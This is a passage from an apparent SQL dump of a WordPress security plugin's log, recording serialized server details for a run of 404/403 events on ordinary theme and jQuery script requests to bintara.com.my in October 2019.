OTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2541\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-includes/js/jquery/jquery-migrate.min.js\";s:10:\"SCRIPT_URL\";s:44:\"/wp-includes/js/jquery/jquery-migrate.min.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pm4k4CZZwMupfWgi4ogAAABI\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629468.0977\";s:12:\"REQUEST_TIME\";s:10:\"1571629468\";}}','notice','2019-10-21 03:44:30','2019-10-21 03:44:28',34974888,36777160,'https://bintara.com.my/wp-includes/js/jquery/jquery-migrate.min.js',1,0,'219.92.69.151'),(28551,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/wp-includes/js/jquery/jquery.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:54:\"https://bintara.com.my/wp-includes/js/jquery/jquery.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:32:\"/wp-includes/js/jquery/jquery.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pm4k4CZZwMupfWgi4oQAAAAI\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:54:\"https://bintara.com.my/wp-includes/js/jquery/jquery.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:32:\"/wp-includes/js/jquery/jquery.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pm4k4CZZwMupfWgi4oQAAAAI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2540\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:54:\"https://bintara.com.my/wp-includes/js/jquery/jquery.js\";s:10:\"SCRIPT_URL\";s:32:\"/wp-includes/js/jquery/jquery.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pm4k4CZZwMupfWgi4oQAAAAI\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629468.0856\";s:12:\"REQUEST_TIME\";s:10:\"1571629468\";}}','notice','2019-10-21 03:44:30','2019-10-21 03:44:28',34970312,36771832,'https://bintara.com.my/wp-includes/js/jquery/jquery.js',1,0,'219.92.69.151'),(28552,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:46:\"/wp-content/themes/onepress/assets/js/theme.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dfe0396a7ca8b89de12d952b2e5ce36a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/theme.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/themes/onepress/assets/js/theme.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnuChWqi2NVtnqluA-wAAAg4\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/theme.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:46:\"/wp-content/themes/onepress/assets/js/theme.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnuChWqi2NVtnqluA-wAAAg4\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2544\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:68:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/theme.js\";s:10:\"SCRIPT_URL\";s:46:\"/wp-content/themes/onepress/assets/js/theme.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pnuChWqi2NVtnqluA-wAAAg4\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629470.5893\";s:12:\"REQUEST_TIME\";s:10:\"1571629470\";}}','notice','2019-10-21 03:44:33','2019-10-21 03:44:31',35004744,36800280,'https://bintara.com.my/wp-content/themes/onepress/assets/js/theme.js',1,0,'219.92.69.151'),(28553,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/wp-content/themes/onepress/assets/js/plugins.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dfe0396a7ca8b89de12d952b2e5ce36a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/plugins.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/wp-content/themes/onepress/assets/js/plugins.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnqjZzpoQqaKQA3II8wAAAMs\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/plugins.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/wp-content/themes/onepress/assets/js/plugins.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnqjZzpoQqaKQA3II8wAAAMs\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2542\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/plugins.js\";s:10:\"SCRIPT_URL\";s:48:\"/wp-content/themes/onepress/assets/js/plugins.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pnqjZzpoQqaKQA3II8wAAAMs\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629470.5003\";s:12:\"REQUEST_TIME\";s:10:\"1571629470\";}}','notice','2019-10-21 03:44:33','2019-10-21 03:44:31',35003728,36806368,'https://bintara.com.my/wp-content/themes/onepress/assets/js/plugins.js',1,0,'219.92.69.151'),(28554,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:57:\"/wp-content/themes/onepress/assets/js/owl.carousel.min.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dfe0396a7ca8b89de12d952b2e5ce36a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/owl.carousel.min.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:57:\"/wp-content/themes/onepress/assets/js/owl.carousel.min.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnuChWqi2NVtnqluA-gAAAhc\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:79:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/owl.carousel.min.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:57:\"/wp-content/themes/onepress/assets/js/owl.carousel.min.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnuChWqi2NVtnqluA-gAAAhc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2545\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:79:\"https://bintara.com.my/wp-content/themes/onepress/assets/js/owl.carousel.min.js\";s:10:\"SCRIPT_URL\";s:57:\"/wp-content/themes/onepress/assets/js/owl.carousel.min.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pnuChWqi2NVtnqluA-gAAAhc\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571629470.54\";s:12:\"REQUEST_TIME\";s:10:\"1571629470\";}}','notice','2019-10-21 03:44:33','2019-10-21 03:44:31',35004576,36805384,'https://bintara.com.my/wp-content/themes/onepress/assets/js/owl.carousel.min.js',1,0,'219.92.69.151'),(28555,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:53:\"/wp-content/plugins/onepress-plus/assets/js/slider.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dfe0396a7ca8b89de12d952b2e5ce36a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/wp-content/plugins/onepress-plus/assets/js/slider.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/wp-content/plugins/onepress-plus/assets/js/slider.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnqjZzpoQqaKQA3II9QAAANU\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/wp-content/plugins/onepress-plus/assets/js/slider.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:53:\"/wp-content/plugins/onepress-plus/assets/js/slider.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnqjZzpoQqaKQA3II9QAAANU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2546\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:75:\"https://bintara.com.my/wp-content/plugins/onepress-plus/assets/js/slider.js\";s:10:\"SCRIPT_URL\";s:53:\"/wp-content/plugins/onepress-plus/assets/js/slider.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pnqjZzpoQqaKQA3II9QAAANU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629470.6137\";s:12:\"REQUEST_TIME\";s:10:\"1571629470\";}}','notice','2019-10-21 03:44:33','2019-10-21 03:44:31',35007528,36813120,'https://bintara.com.my/wp-content/plugins/onepress-plus/assets/js/slider.js',1,0,'219.92.69.151'),(28556,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-content/plugins/onepress-plus/assets/js/onepress-plus.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=dfe0396a7ca8b89de12d952b2e5ce36a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:23:\"https://bintara.com.my/\";s:15:\"HTTP_USER_AGENT\";s:182:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.2; FDM; AskTbARS/5.11.3.15590; BRI/1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:82:\"https://bintara.com.my/wp-content/plugins/onepress-plus/assets/js/onepress-plus.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:60:\"/wp-content/plugins/onepress-plus/assets/js/onepress-plus.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnuChWqi2NVtnqluBAAAAAgU\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:82:\"https://bintara.com.my/wp-content/plugins/onepress-plus/assets/js/onepress-plus.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:60:\"/wp-content/plugins/onepress-plus/assets/js/onepress-plus.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0pnuChWqi2NVtnqluBAAAAAgU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"219.92.69.151\";s:11:\"REMOTE_PORT\";s:4:\"2547\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:82:\"https://bintara.com.my/wp-content/plugins/onepress-plus/assets/js/onepress-plus.js\";s:10:\"SCRIPT_URL\";s:60:\"/wp-content/plugins/onepress-plus/assets/js/onepress-plus.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa0pnuChWqi2NVtnqluBAAAAAgU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571629470.6294\";s:12:\"REQUEST_TIME\";s:10:\"1571629470\";}}','notice','2019-10-21 03:44:33','2019-10-21 03:44:31',35003136,36801128,'https://bintara.com.my/wp-content/plugins/onepress-plus/assets/js/onepress-plus.js',1,0,'219.92.69.151'),(28557,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:54:\"/wp-content/themes/onepress/assets/js/bootstrap.min.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, 